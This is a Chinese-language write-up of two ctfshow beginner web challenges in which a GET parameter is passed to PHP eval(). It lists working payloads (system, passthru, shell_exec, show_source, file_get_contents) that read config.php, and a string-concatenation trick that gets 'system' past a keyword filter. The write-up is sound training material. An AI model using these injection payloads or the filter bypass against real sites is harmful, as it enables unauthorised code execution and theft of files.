一、访问在线靶场ctfshow
1、web9
如下图所示,进入_萌新赛的web9问题,题目提醒flag在config.php中:
如上图所示,可以get传参,且传入的参数需要正则匹配system、exec、highlight,且不区分大小写,eval()可以远程执行命令。
尝试传入参数c=system('ls');,如下图所示:
可以查看到2个文件,再尝试查看第一个文件的内容,传入参数c=system('cat con*');,页面显示空白,火狐浏览器F12,查看器查看时,看到flag,如下图所示:
另外,这里可以使用c=system('tac con*');,即倒着输出config.php文件的内容,如下图所示:
尝试传入参数c=echo shell_exec('tac con*');,如下图所示:
注意system()和shell_exec()的区别,一个会给浏览器显示,一个不会显示(所以需要echo专门来显示一下)。
尝试传入参数c=highlight_file('config.php');,如下图所示:
2、web10
如下图所示,进入_萌新赛的web10问题,题目提醒flag在config.php中:
如上图所示,可以get传参,且传入的参数不能正则匹配system、exec、highlight,且不区分大小写,eval()可以远程执行命令。
尝试传入参数c=passthru('tac con*');,如下图所示:
尝试传入参数c=show_source('config.php');,如下图所示:
尝试传入参数c=echo file_get_contents('config.php');,火狐浏览器F12,查看器中可以查看到flag,如下图所示:
注意:show_souce()、file_get_contents(),需要传入文件全名称,不可用通配符来匹配了。
show_souce()会将文件以html输出到浏览器;file_get_contents()读取文件内容,并以字符串返回,所以需要echo来显示出来。
尝试传入c=$a='sys';$b='tem';$d=$a.$b;$d('tac con*');,即传入的参数在进行正则匹配验证时,可以通过,且这多条php语句在eval()中可以顺次执行,最终拼装成了system('tac con*');,如下图所示:
